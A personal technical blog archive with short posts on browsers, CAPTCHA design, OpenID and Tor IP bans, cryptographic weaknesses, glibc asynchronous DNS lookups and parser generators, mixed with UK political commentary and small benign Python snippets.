    It's certainly lighter than Firefox (my laptop goes swap crazy a lot less) and it properly threads the page rendering so that loading (say) Bloglines doesn't freeze the whole browser for many seconds.

    Its JavaScript/general AJAXy support isn't so good. Gmail works though. And the tabs act slightly wrong when you close them - it switches to the last viewed tab, which is almost never what I want.

    Still, if you too have a system with only 64MB of memory then give it a shot.

    What are they doing to these recordings?

    So today I bought the new KT Tunstall album because it's winning lots of awards and sounded like it could actually be pretty good. I'm going to skip over why a pressed CD needed so much error correction work from cdparanoia on the first couple of tracks and skip straight to the mastering. Here's part of the (raw, PCM) waveform from the fourth track (which I picked at random):

    There's clearly some headroom there, but it's been really aggressively compressed - and it sounds like it. I've never heard a kick drum sound like the skin was a hot water bottle.

    Which is a terrible shame because there's good music under there somewhere.

    Update: just to compare I thought I'd show a bit of Dire Straits at the same scale:

    New pyGnuTLS release than...

    New pyGnuTLS release thanks to a patch from Johan Rydberg

    Nearly gone...

    12 days to go... A few things which I've been doing recently before I lose them:

    Adding libevent support to Gambit Scheme: [patch]

    Adding edge-triggered support to libevent: [patch]. You need this for the Gambit patch. Also, does anyone know if Niels (the libevent maintainer) is still alive?

    A small libevent-based async DNS library designed to be embedded into applications rather than shipped as a .so file. This actually has a known, rare bug in it but I'll have a fix and a real release of this soon: [eventdns.c eventdns.h]

    Best definition ever:Macr...

    Best definition ever:

    Macroxenoglossophobia - Fear of long, strange words.

    (from Wikipedia)

    Skype and the telephone interface

    Technically I must say that I'm quite impressed with Skype. The voice quality is good and it even managed to deal with the computer I ran it on - which is behind two NATs.

    I think they could have done a little better with the interface however. It's just like a normal telephone system; you call someone and their computer rings. You even get missed calls and the like.

    I'd like to see a more asynchronous system. At the moment there's no difference between a call to catch up with someone and an urgent call about the sky falling. I'm discouraged from the former because it's such an interruption and the latter risks getting confused with something less urgent.

    So why can't I place a call and tick a box to say "Low priority" and leave a little text message. I set my Skype to low priority and wait. When the other party sets their Skype to low priority I get a dialog saying, do you want to make this call now?

    But, of course, Skype isn't open source.

    The role of judges

    Mr Howard is echoing the prime minister in calling for judges not to thwart the wishes of Parliament.

    That's interesting because, in this country, Parliament (being the Commons, Lords and Monarch) is sovereign. That means that if they say that all due process is rescinded and that all left handed people are to be shot then there's no legal device to stop them.

    Therefore Parliament has no need to worry that any judge can overrule them.

    So the reason why Howard and Blair are warning the judges is because they want to keep both the Human Rights Act and whatever they are dreaming up at the moment. Having the HRA gives them a warm feeling and the belief that they are better than countries which perform torture in house, as opposed to outsourcing it.

    There's no such thing as judges overruling Parliament in this matter. The Commons is just afraid of someone calling them on their contradictions.

    CAPTCHA issues

    Jeffrey Baker managed to OCR some of the images produced by my CAPTCHA program. This isn't terrible because I knew that some of the images were almost flat and could probably be OCRed, so I tweaked the rotation code so as to make more of the images come out with larger angles.

    What I hadn't expected was that people would have such trouble reading them. I did a quick test and got 100% on a small set (about 50) of images. But some people can't even manage the sample images on that page. I certainly tuned the program so that I could read them and assumed that everyone would be the same. Clearly not.

    That means that I can't increase the angles of the images to break the OCR.

    So I got to thinking this morning while trying to forget a slightly weird dream (I was asleep and dreaming, in a dream. Then I became aware that I was dreaming, but I thought that I was only one level deep before waking up, twice). The point of the 3D text was to try to make a translator reconstruct the 3D world. (Which is (or should be) pretty easy for a human).

    So, meet Sammy the Stick Man:

    Sammy the stick man

    He gets rotated in lots of directions and you have to name which part of him is lit up. In this case the answer would be "left foot". Couple of problems: only 6 possible values. That's not actually too bad for the use I want it for because I'll be giving the user lots of them to solve so I can get a measure of their success rate (which had better be > 1/6 for a human). Next: there are too few images. It would be too easy to have a human classify 1000 images and then have the computer do a dumb image closeness match.
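
    To put a rough number on the success rate idea, here is a small sketch of how unlikely it is for a program guessing at random (probability 1/6 per puzzle) to pass a threshold. The function name and the 20-puzzle, 10-correct policy are my own assumptions for illustration, not something the CAPTCHA program does:

```python
from math import comb


def p_guesser_passes(n, k, p=1 / 6):
    """Probability that random guessing gets at least k of n puzzles right."""
    return sum(comb(n, i) * p**i * (1 - p) ** (n - i) for i in range(k, n + 1))


# Hypothetical policy: show 20 puzzles and require at least 10 correct.
chance = p_guesser_passes(20, 10)
```

    With only six answers a single puzzle proves nothing, but the binomial tail shrinks quickly as the number of puzzles grows. It does nothing about the second problem, of course: a lookup table of classified images answers correctly, not randomly.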

    So Sammy doesn't get released into the real world but maybe something will come of it.

    Skype

    I've finally got round to getting Skype working with SkypeOut. Seems good. People are free to try me over Skype (nick: aglangley) as I'd be interested to see how the quality of computer to computer is.

    That's all sorted then

    Barring the actual delivery of the paperwork I now seem set to start at Google full time in October. I'll be moving to Mountain View in late September. Anyone with experience of this (e.g. getting a drivers license etc) is welcome to email me about now ;)

    Books (see last post) are disappearing. I've moved about 20 of them so far. I'm trying to sell a few of the larger ones on Amazon to see if I can make something off them. A few have gone but I expect I'll have more going free if the rest are still here in four weeks time.

    Can anyone explain why batteries work the whole world over? Nothing else does - certainly not mains power which varies in every axis you can think of. Did some company have a worldwide monopoly on batteries for years and set all the standards?

    Currently working on: a standard library for Gambit Scheme.

    Lots of books

    With a bit of luck and a following wind I'm leaving the country quite soon and so the utility value of all my books is rapidly approaching zero. Once I have to store them the value actually becomes negative.

    Thus, if you live near me there are a whole lot of free books going. Here are a couple of pictures of a couple of my bookshelves. If you see anything you like you are welcome to drop by and pick it up (email me first though). If you live further away and you're willing to cover the postage, drop me an email as well.

    Update: I'm living in Cheltenham for the moment, not London.

    Image 1

    Image 2

    Gambit

    I've been on about concurrency orientated programming languages for a while now and mostly I've been working in Python; because I like Python. But I keep hitting the edges of the language. Generators were a very promising feature before I knew what they actually were. When they were being discussed it looked like Python was going to get full coroutines, but in the end generators ended up being crippled in several ways:

    • You cannot yield inside a function call because, once you try to, that function then becomes a generator too. This is the big problem.
    • You can only pass values out of a generator, not the other way round. This may be addressed in Python 2.5 with PEP 342. You can already get around it to some degree by updating an external variable.

    I'm sure generators solved the needs of some percentage of users at a lesser complexity and runtime cost of full coroutines. But support for PEP 342 is already showing that they struck the balance too far to the side of minimal changes.
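
    Both limitations can be seen in a short sketch. This is written for a current Python, where the `send()` method from PEP 342 is available; the function names are made up for the example:

```python
def helper():
    yield "from helper"      # this makes helper itself a generator


def naive():
    helper()                 # only creates a generator object; nothing is yielded
    yield "from naive"


def delegating():
    for value in helper():   # the caller has to re-yield every value by hand
        yield value
    yield "from delegating"


def echo():
    received = None
    while True:
        # PEP 342: send() passes a value back in through the yield expression
        received = yield received


naive_out = list(naive())              # helper's value never appears
delegating_out = list(delegating())    # helper's value appears only via the loop
gen = echo()
next(gen)                              # run to the first yield
reply = gen.send("hello")              # the generator hands back what it was sent
```

    The `naive` case is the big problem from the first bullet: the call to `helper()` cannot suspend its caller, so every function between the scheduler and the point of suspension has to be written as a generator and driven explicitly.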

    But the good news is that someone is building Erlang-like concurrency primitives with Gambit in the form of a project called Termite. Gambit is a Scheme which can compile to C code (as well as being interpreted) and has support for full lightweight threads and continuations. If you read the linked slides above by Joe Armstrong you'll see his challenge to language writers about the number of message passing threads in a ring. That challenge is well met by Gambit in the examples directory.

    Termite doesn't have a source code release yet, but it should be soon. And scheme certainly has all the power one could ever want (and a syntax that no one would want). I'll post further comment when Termite is real.

    Open source CAPTCHA

    All the open source CAPTCHA programs either seem to be written in PHP or they are really easy to OCR (or both). So here's one which I hope is tough to break, is open source (CC public domain licensed) and runs as a simple CGI so anything should be able to use it.

    Got back from opentech la...

    Got back from opentech late last night and you can find my pictures on flickr. You can find everyone else's there too. Well done to Dave, Sam and Polly for organising it.

    OpenID server

    As I've said before, OpenID is a distributed single sign-on system. It also seemed like a good time to have a play around with this Ruby on Rails thing that everyone is going on about.

    So there is now openid.imperialviolet.org. Have fun.

    Profiteering

    Profiteering is good. I just thought I needed to point that out in the light of this: "Vow to shame any owners caught profiteering".

    Economics is the study of the allocation of scarce resources. Capitalism is the best solution that we have to that problem. It has problems (imperfect information, corruption etc) but fundamentally the laws of supply and demand work better than anything else that people have tried.

    Many people feel uncomfortable that hotels should profit from a disaster in some sense of solidarity with the victims. Solidarity is fine, but I don't think that means that everyone must have a bad day because some people did. Anyway, getting back to the point.

    When the demand for something rockets (as it did for hotel rooms in London on Thursday) hotels could keep their prices the same. In that case there will be a shortage of rooms because rooms will be allocated nearly on a first come, first served basis. Some people might be able to walk home but will decide not to bother because a hotel room isn't all that expensive. Others, who cannot get home, can't get a room because they have all gone. I don't think anyone would imagine that that's a good scheme.

    So when hotel prices go up some people will decide that they value their money more than the comfort of not having to walk home. Those left in the hotel will be those who value the hotel room more. In a world of perfect information there would be no shortage of hotel rooms because the price would rise such that demand was suppressed to the level where it could be met exactly.

    And yes, that means that wealthy people might be able to get hotel rooms where less wealthy people might not. That's the reality of wealth and I would hope that most people know enough history to know that the alternative is much worse.

    I took the time today to ...

    I took the time today to phone (some of) my MEPs about the software patent vote tomorrow. I picked the names somewhat at random so long as they were representatives for an area I live in. Remember that the outcome we want is a vote for the Buzek-Rocard-Duff amendments.

    • Caroline Lucas: Voting for, goes for all Greens. Glad I voted Green for the EU
    • Richard Ashworth: Didn't know how he was going to vote
    • Gerard Batten: No answer
    • Chris Beazley: Answering machine (left message)
    • Andrew Duff: As I dialed I suddenly remembered what the amendments were called and suspected that this was probably a good guy. He was.
    • Fiona Hall: Answering machine (left message)
    • Sarah Ludford: Didn't know. Will email me.

    Overall, not a stunning outcome.

    If you want to call some MEPs today (and please do) you can find phone numbers and names here. Remember that the international escape code is 00 (so replace + in phone numbers with that) and you don't dial the zero in brackets (if any).

    When I phoned I basically said this, and it seemed to work ok:

    Good afternoon. Is that the office of FULLNAME? I'm just phoning to register my hope that TITLE SURNAME will be voting for the amendments in the software patents vote tomorrow.

    ... and go with the flow from there. I found that the Brussels office is more often manned, but I think the actual people are at Strasbourg.

    (background information on this issue.)

    Was a little surprised to...

    Was a little surprised to see this in the Independent today (note the author). I suppose I shouldn't be since he talks so much anyway.

    Letter from RMS

    Decoupling authentication and IP addresses

    No one uses IP addresses for authentication these days, right? All that went out with rhosts one would hope. Sadly it's not true and when you have an anonymising onion network you really start to understand how important IP authentication still is.

    Many sites ban all Tor nodes from posting. Many IRC networks (even the `clueful' ones like freenode) ban Tor as well. This is usually caused by abuse from trolls using Tor, of course. But the only course of action that these networks have is to ban by IP address.

    So, more precisely, IP addresses aren't a source of authentication as much as they are a finite resource which can be used to hit people with. Like losing a deposit, losing an IP address is a punishment to deter people from abuse since IP addresses are considered finite.

    Now that's a pretty bad approximation and leads to people getting banned for no good reason because someone else was a troll from the same IP address. It really starts to go wrong in the face of large proxies (like AOL's), dynamic IP ranges and, of course, Tor.

    OpenID is the most exciting movement in this area that I've seen for a long time. (It's a protocol which could never be written by a standards body because it's designed to work given the realities of the Internet, not despite them. For an example of the latter see IPv6.)

    OpenID basically lets you nominate a server as your `identity' and prove to a 3rd party that you control it. That doesn't solve anything right away because I can produce identities at will. What we need is an alternative limited resource which we can hit people with.

    Hashcash uses CPU time which is a little problematic because the speed difference between someone on a dual-core, 64-bit Athlon and a mobile phone is pretty big. Mojonation used disk space - which is problematic because it's difficult to make that work in this context.
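
    For anyone who hasn't seen the Hashcash idea, here is a simplified sketch of it. It is not the real Hashcash stamp format: the `resource:counter` layout, the function names and the use of SHA-256 are all choices made for this example.

```python
import hashlib
from itertools import count


def leading_zero_bits(digest):
    """Count the zero bits at the start of a byte string."""
    bits = 0
    for byte in digest:
        if byte == 0:
            bits += 8
            continue
        bits += 8 - byte.bit_length()
        break
    return bits


def mint(resource, bits):
    """Search for a counter so the hash of 'resource:counter' has `bits` leading zeros."""
    for counter in count():
        stamp = f"{resource}:{counter}"
        if leading_zero_bits(hashlib.sha256(stamp.encode()).digest()) >= bits:
            return stamp


def verify(stamp, resource, bits):
    """Checking a stamp costs one hash, however long minting took."""
    digest = hashlib.sha256(stamp.encode()).digest()
    return stamp.startswith(resource + ":") and leading_zero_bits(digest) >= bits


stamp = mint("someone@example.org", 12)   # about 2**12 hashes on average
```

    The cost of `mint` is measured in hashes, which is exactly the problem described above: the same number of bits is trivial on a fast desktop and painful on a phone.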

    I'm suggesting that we use human time as measured by CAPTCHAs. Although the state of the art in breaking CAPTCHAs is getting pretty good, the best CAPTCHAs are still good enough. You can easily imagine a page which would take half an hour to complete and would sign an identity when done. That half an hour of time is the limited resource that you can lose.

    Of course, you can hire out a sweatshop in China to solve these things, or make a distributed network of people paid in free porn but the threat model here is the Slashdot troll. And how well would your IP address blocking scheme work against the same attack?

    What's the transition path? (If an idea doesn't have a transition plan that's probably because the transition will never happen; again, see IPv6.) Websites can start using this right away in the whole `single sign on' way that OpenID is designed to allow. Other services are more of a pain because specific client and server libraries need to be written along with an ssh-agent-like daemon. So let's leave IRC alone for a while and see if we can get sites like Wikipedia to allow it.

    (Actually, in the case of Wikipedia I'm not too hopeful. I've had a patch to improve their IP blocking pending for weeks now with no movement whatsoever.)

    MGM vs. Grokster

    (You should, of course, read the judgement before reading any comments on it.)

    The important paragraph in this result is:

    One who distributes a device with the object of promoting its use to infringe copyright, as shown by clear expression or other affirmative steps taken to foster infringement, going beyond mere distribution with knowledge of third-party action, is liable for the resulting acts of infringement by third parties using the device, regardless of the device's lawful uses.

    This is pretty vague, legal wise. Consider the design of Freenet. Node operators were unable to see what data was stored on their node. It could have been fragments of any file and we considered that a defence against "questionable content" (e.g. pro-democracy docs in China). Now, imagine that Freenet ever worked well enough to allow for large scale file sharing. Does that aspect of the design open us up to an MGM lawsuit? It's an `affirmative step' taken to make the network difficult to police. Therefore the argument comes down to `we weren't thinking of file sharing when we designed it - honest!'. It seems pretty impossible to believe that technically competent people wouldn't consider that any communication system could be used for file sharing.

    This ruling requires a lot of clarification before there can be any kind of checklist of what is illegal. In the meantime you have to consider if you want to develop any kind of network because you might get sued for it. That's exactly the permission world that MGM et al want. Change is a bitch for those who profit by the status quo.

    We apologise for this short interruption of service...

    Firstly, sorry to anyone who emailed me in the last three days and I didn't get back to them. My (somewhat crappy) host had a server failure and I didn't notice. The backlog of email is getting through now.

    Secondly, I'm on an RSI avoidance typing break for a while. Nothing serious, just a definite hint from my body that I need to stop hacking for a bit. I intend to do something about it when I get home (probably involving a Kinesis keyboard and trackball) but until then I'm taking a break and crewing (single-handedly it turns out) a play in Bethnal Green.

    Current hacking plans involve adding OAEP and DH support to nettle and then finishing pyThistle (a Python crypto library built on nettle). pyThistle then replaces libgcrypt (see rant below) in my Python Tor node. Hopefully, when the Tor node works it can be a platform for testing new ideas in Tor.

    Also, my Google searchkeys script might be used in a forthcoming book by Mark Pilgrim (of Dive Into x fame). That is assuming that I ever manage to remember to fax the permission form off.

    That's it. All done.

    Finished at Imperial. If you really want you can read my final project report. There's nothing new in there for IV readers.

    Well done BBC...And we've...

    Well done BBC...

    And we've just had another huge roll of thunder.

    At least no one is panicking

    We're at a strange point in cryptography at the moment. Two of our foundations are mortally wounded and no one seems to have a good answer to either of them. Our unfortunate foundations are SHA1 and AES.

    Lots of people have debated about how important the break of SHA1 (and MD5 et al) really is. These two postscript documents with the same hash are the latest round from the “it's important!” crowd. The defense is pointing out that the postscript files are actually programs which introspect themselves and you can never trust such a document etc.

    But the point is that you now have to sit down and consider if the way that you're using SHA1 is weak. That's mortally wounded. A good hash function shouldn't need thought to use.

    Next up, AES. The blow was delivered by DJB in this paper. I've not seen many people talking about it, but it seems to me that you now have to sit down and consider how you're using AES and how much timing information you're leaking each time you use it. That's also mortally wounded.

    So, where do we go from here? (And, if you can hear the tune as you read those words you're a wise man )

    Why one should never use libgcrypt

    I've been using libgcrypt in a Tor related project and I must say that it's terrible:

    • The public key interface is so terribly abstract they've implemented S-expressions (in C) via which you pass all the data. It's only two algorithms! The abstraction layer is several times thicker than the actual useful code!
    • (yes, they do have an alternative interface to the public key code but it's little better and restricted. I'm now using the MPI code directly and implementing RSA myself. The MPI code, at least, works.)
    • None of the hashes can be used progressively. Once you call read() you can't update them any more.
    • Counter mode is a joke. I spent about three hours tracking down a bug only to find that their idea of counter mode was completely wrong. I've sent a patch, but no reply yet.
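
    To show what I mean by using a hash progressively, here is the behaviour I'd expect, sketched with Python's hashlib. This is only an illustration of the idea; it is not libgcrypt's API:

```python
import hashlib

h = hashlib.sha1()
h.update(b"first chunk, ")
midway = h.hexdigest()          # read the digest of the data so far...
h.update(b"second chunk")       # ...and then keep feeding the same context
final = h.hexdigest()

# The running context ends up at the same value as hashing everything at once.
one_shot = hashlib.sha1(b"first chunk, second chunk").hexdigest()
```

    Reading the digest here doesn't finalise the context, so one running hash can be sampled as often as needed.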

    Mr. Blair: 'Ello, I ...

    Mr. Blair: 'Ello, I wish to register a complaint.

    (The owner does not respond.)

    Mr. Blair: 'Ello, Miss?

    Owner: What do you mean "miss"?

    Mr. Blair: I'm sorry, I have a cold. I wish to make a complaint!

    Owner: We're closin' for lunch.

    Mr. Blair: Never mind that, my lad. I wish to complain about this constitution what I purchased not half an hour ago from this very boutique.

    Owner: Oh yes, the, uh, the EU Constitution...What's,uh...What's wrong with it?

    Mr. Blair: I'll tell you what's wrong with it, my lad. 'E's dead, that's what's wrong with it!

    Owner: No, no, 'e's uh,...it's paused.

    Mr. Blair: Look, matey, I know a dead constitution when I see one, and I'm looking at one right now.

    Owner: No no it's not dead, it's, it's paused! Remarkable constitution, the EU constitution, idn'it, ay? Beautiful language!

    Mr. Blair: The language don't enter into it. It's stone dead.

    Owner: Nononono, no, no! 'E's paused!

    Mr. Blair: All right then, if he's paused, I'll start it up! 'Ello, Mister Constitution! I've got a lovely fresh new member for you if you show...

    (owner hits the cage)

    Owner: There, it passed!

    Mr. Blair: No, it didn't, that was you fixing the vote!

    Owner: I never!!

    Mr. Blair: Yes, you did!

    Owner: I never, never did anything...

    Mr. Blair: (yelling) 'ELLO POLLY!!!!! Testing! Testing! Testing! Testing! This is your nine o'clock alarm call!

    (Takes constitution and thumps it on the counter. Withdraws plans for a UK referendum)

    Mr. Blair: Now that's what I call a dead constitution.

    Owner: No, no.....No, it's stalled!

    Mr. Blair: STALLED?!?

    Owner: Yeah! You stalled it, just as it was gettin' going! EU Constitutions stall easily, major.

    Mr. Blair: Um...now look...now look, mate, I've definitely 'ad enough of this. That constitution is definitely deceased, and when I supported it not 'alf an hour ago, you assured me that its total lack of movement was due to voter apathy

    Owner: Well, it's...it's, ah...probably a protest vote against unpopular governments

    Mr. Blair: PROTEST against unpopular GOVERNMENTS?!?!?!? What kind of talk is that? Look, why did it fall flat on its back the moment it got put to the vote?

    Owner: The EU Constitution prefers keepin' on its back! Remarkable constitution, id'nit, squire? Lovely language!

    Mr. Blair: Look, I took the liberty of examining that constitution when I got it home, and I discovered the only reason that it had even been proposed in the first place was that NO ONE had ever managed to read it all.

    (pause)

    Owner: Well, o'course no one's read it! If people read it they would be marching down the streets DEMANDING its introduction

    Mr. Blair: "DEMANDING"?!? Mate, this constitution wouldn't be introduced if you put four million volts through it! 'E's bleedin' demised!

    Owner: No no! 'E's stalled!

    Mr. Blair: 'E's not stalled! 'E's passed on! This constitution is no more! It has ceased to be! 'E's expired and gone to meet its maker! 'E's a stiff! Bereft of life, 'e rests in peace! If you hadn't started on about the rebate 'e'd be pushing up the daisies! Its metabolic processes are now 'istory! 'E's off the twig! 'E's kicked the bucket, 'e's shuffled off 'is mortal coil, run down the curtain and joined the bleedin' choir invisibile!! THIS IS AN EX-CONSTITUTION!!

    Owner: What about that rebate then?

    Mr Blair: fuck off.

    New page - ICSM Choir at ...

    New page - ICSM Choir at St Paul's Church recorded by YT.

    Live 8

    You can now txt C to the Live 8 number (84599) to enter into the draw. Let's say, for example, that 10 million people enter. There are 72,500 winners (each winner gets a pair of tickets, but I'll not count the lucky tag-alongs as winners for now). So there's a 72500/10000000 ≈ 1/138 chance of winning a ticket. Since each entry in the draw costs £1.50-£1.60 the effective price of a ticket-pair is £207-£221. That's one hell of an expensive ticket!
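    The arithmetic above is easy to redo for other guesses at the number of entries. This is a small sketch, not anything official: the function name is made up for illustration, and the 10 million entries figure is the same assumption as in the text.

```python
from fractions import Fraction


def effective_pair_price(entries, winners, cost_per_entry):
    """Expected spend per winning entry: entry cost divided by the chance of winning."""
    chance = Fraction(winners, entries)
    return float(Fraction(cost_per_entry) / chance)


if __name__ == "__main__":
    # Assumed inputs: 10 million entries, 72,500 winners, £1.50 to £1.60 per text.
    for cost in ("1.50", "1.60"):
        price = effective_pair_price(10_000_000, 72_500, cost)
        print(f"£{cost} per entry -> £{price:.2f} per ticket-pair")
```

    Doubling the assumed number of entries doubles the effective price, so the conclusion only gets worse if the draw is popular.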

    New page up about using T...

    New page up about using Tor with Firefox 1.1

    Asynchronous DNS lookups with glibc

    This is very poorly documented, but glibc can do DNS lookups asynchronously. You can get the original design document here, but it's a bit verbose.

    Firstly, this is glibc specific and you need to link against libanl. The headers you'll need are netdb.h and signal.h

    The core function is getaddrinfo_a which takes four arguments:

    int getaddrinfo_a(int mode, struct gaicb *list[], int ent, struct sigevent *);

    The mode is either GAI_NOWAIT or GAI_WAIT. Since you're trying to do asynchronous lookups you'll want GAI_NOWAIT. A gaicb looks like:

    struct gaicb {
    	const char *ar_name;
    	const char *ar_service;
    	const struct addrinfo *ar_request;
    	struct addrinfo *ar_result;
    };

    You should see the manpage for getaddrinfo for details of those fields. In short, set ar_name to the hostname and set ar_service, ar_request and ar_result to NULL.

    So, getaddrinfo_a takes a pointer to a list of those structures and ent is the number of entries in that list. The final argument tells glibc how you want to be informed about the result. A sigevent structure looks like:

    struct sigevent {
    	sigval_t sigev_value;
    	int sigev_signo;
    	int sigev_notify;
    	void (*sigev_notify_function) (sigval_t);
    	pthread_attr_t *sigev_notify_attributes;
    };

    So you can either ignore the notification (set sigev_notify to SIGEV_NONE), get a signal (set sigev_notify to SIGEV_SIGNAL) or request a callback in a new thread (set sigev_notify to SIGEV_THREAD).

    Hopefully the rest of the values are fairly obvious in light of that. If you want the sigev_value to be passed to a signal handler you'll need to register the handler with the SA_SIGINFO flag to sigaction. Also remember that the realtime signals (SIGRTMIN+0 to SIGRTMIN+31) are free for user-defined uses.

    When you get notified (or, indeed, at any time) you can call int gai_error(struct gaicb *), which returns 0 if the request has completed successfully and EAI_INPROGRESS if it is still being processed. Any other return value is an error code, which you can find as EAI_* in netdb.h. Once you know that a request has completed you can get the result from the ar_result member. And you will remember to call freeaddrinfo, won't you?

    First release of new proj...

    First release of new project: pyGnuTLS

    Hmm, I wonder if it's getting too complex...

    Apparently I'm all wet!

    Jeff Darcy replies to my last post:

    What Adam seems to be considering is only a pure party-list system, in which there is no geographic representation at all, but thats not the only kind. In fact, under either an Additional Member System or Mixed Member System (from the copy of the Voting Systems FAQ that I've been hosting for two years), the exact balance between geographically-elected and “at” large candidates can be set anywhere from one extreme to the other just by adjusting the number of representatives selected each way. If the "my local representative works for me" dynamic is weaker under such a system, its by design.

    When people shout “proportional representation”, that's what they mean around here. I didn't mean to suggest that other systems with proportional elements don't exist, but even in those systems my concerns still stand (to a greater or lesser extent, depending on the degree of proportionality).

    Proportional representation is not a way to select MPs, it's a way to select parties. In a proportional vote you really might as well give the parties block votes and save the effort. Debates may be held, but a party has made its mind up by the time the bill reaches the house. (The quality of Commons debates is usually pretty bad as well.)

    That brings me to a more general kind of question about arguments like Adams. Why is geographic representation considered so important anyway?

    Geographic selection is much less useful and less needed now than ever before. But it still gets us a specific representative for each person in the country. (As you can guess, I quite like that.) I think there should be more feedback for a legislature than a single vote once every five years. I just don't see that a letter to "party headquarters" is the same. (Maybe I'm fooling myself in thinking that writing to an MP makes any more difference at the moment.)

    So maybe we would be better off without a geographical basis. Let people vote for a single party and give that party voting power equal to number of votes/total number of voters. The party can then use their fraction to vote in a representative manner (possibly with internal voting procedures). We could all vote for the "Freedom loving geek party" and be happily represented.

    (In fact, if a party were allowed to split their fraction into "yes" and "no" parts we could vote for a direct democracy party which would let its members vote on each and every decision and split the party vote accordingly. Direct democracy worries me because a great many of my fellow countrymen are really stupid. Several years ago I'm sure that a popular vote would have introduced the death penalty for pediatricians, such was the public concern about pedophiles.)

    This also leaves open the question of how the executive is selected. At the moment it's the leader of the biggest party (well, actually, it's up to the Queen, but she's pretty predictable). With a proportional system we may well need to directly elect the executive too. Condorcet anyone?

    But I'm unsure about prescribing such a change because there are likely to be lots of emergent effects. Thus my support for a fairly modest change (to approval voting) at first.

    Male Brains

    A little while back the president of Harvard upset a lot of people by suggesting that men and women aren't identical. Steven Pinker and Elizabeth Spelke recently had a fantastic debate on this subject (though they are careful to call it a conversation for some reason). You should absolutely take the time to watch it.

    As you can probably guess I started watching it with the opinion that there are important differences between males and females which go some way to explaining the ratio in top-tier academic positions. After watching it I still have that view, but I enjoyed Spelke's presentation as a mental exercise in picking apart arguments if nothing else.

    I think that discrimination is stupid and wrong and I certainly don't support “affirmative action”. Discrimination is still wrong even when someone says “It's fine in this case because it's discriminating in favor of what I want”. It's amazing how quickly some groups turn about when the discrimination is in their favor.

    Electoral Reform

    Once again, many people are looking at the numbers of MPs vs. the percentage of votes cast and noting the sad difference that first-past-the-post brings. Proportional representation and STV are being shouted again.

    Firstly, STV sucks[1][2]. It should never be used for anything.

    Secondly, proportional representation means that no one is responsible for you. At the moment, you can type your postcode into TheyWorkForYou and find out who your MP is. Your very own MP, and there's no discussion about who is responsible for listening to your concerns.

    Party lists mean that many people are responsible for you, and that means that no one is. And they have to vote with the government because their job depends on it. MPs in this situation become so useless they could just as well give the parties a block vote and be done with it.

    And, of course, there are lots of parties and lots of backroom dealings to form coalitions. Ick.

    As a first step I think we should switch to constituency based approval voting to eliminate tactical voting and redistrict to make things a little more fair. It's a good first step and we can reassess things after a couple of elections under that system.

    (Lack of posting due to e...

    (Lack of posting due to exams - which still aren't over)

    Yep, I've voted. Actually I did it sometime ago since it was a postal vote. Not because I'm lazy, but because I live on the other side of the country. I actually quite like going to the polls and wouldn't postal vote given the chance.

    Truly, this time, it was a question of the least bad option. There are no center-right options in this country. Because of that we'll wake up tomorrow with another Labour government, but with a reduced majority.

    The country feels like it's standing in line at the supermarket. The queue is dreadful but, looking to the left and right - none of the others look like they're moving any faster. So you just stay where you are because you really don't want to jump queues and find out that the original one was a better option.

    Never mind, because much more important to the future is the French vote on the EU Constitution later this month - and I don't even get to vote in that.

    Better typing through key maps

    Everything I program these days is either C++ or Python and I'm sure that if a keyboard was designed by Python programmers it wouldn't be Qwerty. "Dvorak" they shout and I know that it works for some - but not for me. It screws me up too much whenever I use another computer.

    However, a few small tweaks have improved the comfort of Qwerty a lot for me. I have these mappings at Vim insert level (imap) so they only happen in one mode of one application, which works ok for me (though it is a pain when using the Python interactive console). They all consist of switching an unshifted keypress with a shifted one. (Please note that I use a UK keyboard.)

    Python

    • '-' ↔ '_' — __init__, function_names, need I say more? Underscore is a much more useful character to have unshifted.
    • '9' ↔ '(' and '0' ↔ ')' — again, brackets are far more useful than the numbers, though I do type 0 far more often than I had realised.
    • ';' ↔ ':' — when is semi-colon ever used in Python?

    C/C++

    • The whole top row from '1' to '-' — '"', '&' and '*' esp useful to have to hand. Also shifting all the numbers doesn't mean that some digits are shifted and some aren't, as with my Python mappings.
    • '`' ↔ '->' — not a key mapping as such since the result is more than one character long - but very useful.

    For C++ I'm also looking at the '\'' and '#' keys and wondering if they could be put to better use.

    Parsers for network protocols

    (If you wish, you can see this post as being related to the previous two. This is all about automatically building state machines, which happens to be very useful in Actor systems. If you can make all your actors stack-free then you can save memory, schedule them across worker threads etc. But, it also stands alone.)

    Parser theory is well established. People usually reach for the parser generator when it comes to handling complex files. (Possibly not quite as often as they should if the state of some config parsers is anything to go by.) Parsers are understood and work.

    Why then does no one use them for parsing network protocols? It's not like network protocols are too simple. Take section nine of the IMAP RFC. That's complex. Why does anyone want to write a parser for that when the EBNF is provided?

    Did you know that the following is valid HTTP?:

    GET / HTTP/1.1
    Host:
      www.webserver.com

    If you read the HTTP RFC and the EBNF definitions of LWS etc you can check it. It's the sort of thing that hand built parsers often miss. It doesn't work with whatever webserver /. is using for one.
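    To make the folding rule concrete, here is a minimal sketch of the unfolding step: a header line that starts with a space or tab continues the previous line. It is hand-written purely to illustrate the rule (which rather proves the point about how easy it is to forget), and the function names are made up for this example.

```python
def unfold_headers(raw):
    """Join continuation lines (starting with space or tab) onto the previous line."""
    lines = []
    for line in raw.split("\r\n"):
        if line[:1] in (" ", "\t") and lines:
            # Leading whitespace marks a continuation of the previous header.
            lines[-1] = lines[-1] + " " + line.strip()
        else:
            lines.append(line)
    return lines


def parse_headers(raw):
    """Return a dict of lower-cased header names to values for a header block."""
    headers = {}
    for line in unfold_headers(raw):
        if not line:
            continue  # blank line: end of the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


if __name__ == "__main__":
    # The header block from the request above, without the request line.
    print(parse_headers("Host:\r\n  www.webserver.com\r\n\r\n"))
```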

    These aren't simple protocols and, if you're coding in C/C++, chances are you'll screw it up in a buffer-overflowable or a seg-fault-killing-the-whole-process way. Parsers can do it better.

    So why don't people use generated parsers? Probably because they've been designed for parsing files and all the toolkits are built around that idea:

    • Common generated parsers don't allow partial results. They parse the whole thing and give you a big tree but you probably want information about what's happening as it happens.
    • Parsers often generate foul right-recursive parse trees.
    • Parsers often need a tokenising pre-processing step which doesn't work well for network protocols which have complex token rules and binary data mixed in with the text.
    • Parsers often need lots of rule mangling before the grammar works.

    Less importantly...

    • Parser generators aren't that simple. Even an SLR parser (a simple one) takes 800 lines of Python in my implementation.
    • They're slower. Probably not an issue with C code, but my pure Python parser does only 200 HTTP headers/second on a 450MHz PII.

    I've addressed the first four problems in something I'm hacking up at the moment. Firstly, you can tell when any reduction happens as soon as you feed the data into the parser. So you could ask for the HTTP headers as they happen.

    To explain the second problem, consider SLR type rules:

    Token := TokenChar
    Token := TokenChar Token

